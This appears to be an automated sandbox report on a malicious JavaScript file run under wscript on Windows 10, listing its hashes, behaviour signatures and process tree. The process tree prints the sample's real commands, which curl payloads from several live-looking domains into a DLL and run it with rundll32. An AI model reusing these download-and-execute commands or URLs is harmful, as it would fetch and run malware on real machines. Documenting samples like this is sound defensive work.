Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2023 13:25

General

  • Target

    Decuy.js

  • Size

    64KB

  • MD5

    1d3f6ed7311735a444d6476a38e7aee1

  • SHA1

    417c149545b2540c77a795570fbfff6c8e97dc17

  • SHA256

    3f0abcafae8954ff4b4638efb83a7e286bf8aa2876032dab9f778cb91b74c984

  • SHA512

    b297ec60eb79203726445c43dd01d2eebb417d0376b85c3250391297df72ce56687f0ce032724d4fba3ea1364cfe624f923dc994e2e2be64f3bf87c9dc4e9be5

  • SSDEEP

    768:U0lkTF16szQM0NHMSK6Plp7lx1VghlNm7PUKmeHlRGcZgx/4jYx0WAdl2Albhcoz:U0USszFKEkcp2EUfgK4ze3nKT7EcVW

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Decuy.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2696
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://ucakbiletsorgulama.com/U14/0.14668916972533513.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3968
      • C:\Windows\system32\curl.exe
        curl https://ucakbiletsorgulama.com/U14/0.14668916972533513.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
        3⤵
          PID:3060
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://mexicopostalcode.com/51h6Kn/0.735638010060241.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4700
        • C:\Windows\system32\curl.exe
          curl https://mexicopostalcode.com/51h6Kn/0.735638010060241.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
          3⤵
            PID:2068
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl 0.8064026701733842.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2780
          • C:\Windows\system32\curl.exe
            curl 0.8064026701733842.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
            3⤵
              PID:5040
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://adanacamasiryikama.com/BDs19Ul/0.3227317103926319.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2420
            • C:\Windows\system32\curl.exe
              curl https://adanacamasiryikama.com/BDs19Ul/0.3227317103926319.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
              3⤵
                PID:1148
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl 0.3503180301973408.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3584
              • C:\Windows\system32\curl.exe
                curl 0.3503180301973408.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                3⤵
                  PID:1564
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://kartvizitfiyatlari.com/rLhb/0.8224446977603759.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:4336
                • C:\Windows\system32\curl.exe
                  curl https://kartvizitfiyatlari.com/rLhb/0.8224446977603759.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                  3⤵
                    PID:4908
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3604
                  • C:\Windows\system32\timeout.exe
                    timeout 10
                    3⤵
                    • Delays execution with timeout.exe
                    PID:4932
                  • C:\Windows\system32\rundll32.exe
                    rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter
                    3⤵
                      PID:4392
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://adanacigkoftesiparis.com/ViUbB/0.23900339999950276.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3920
                    • C:\Windows\system32\curl.exe
                      curl https://adanacigkoftesiparis.com/ViUbB/0.23900339999950276.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
                      3⤵
                        PID:3784

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads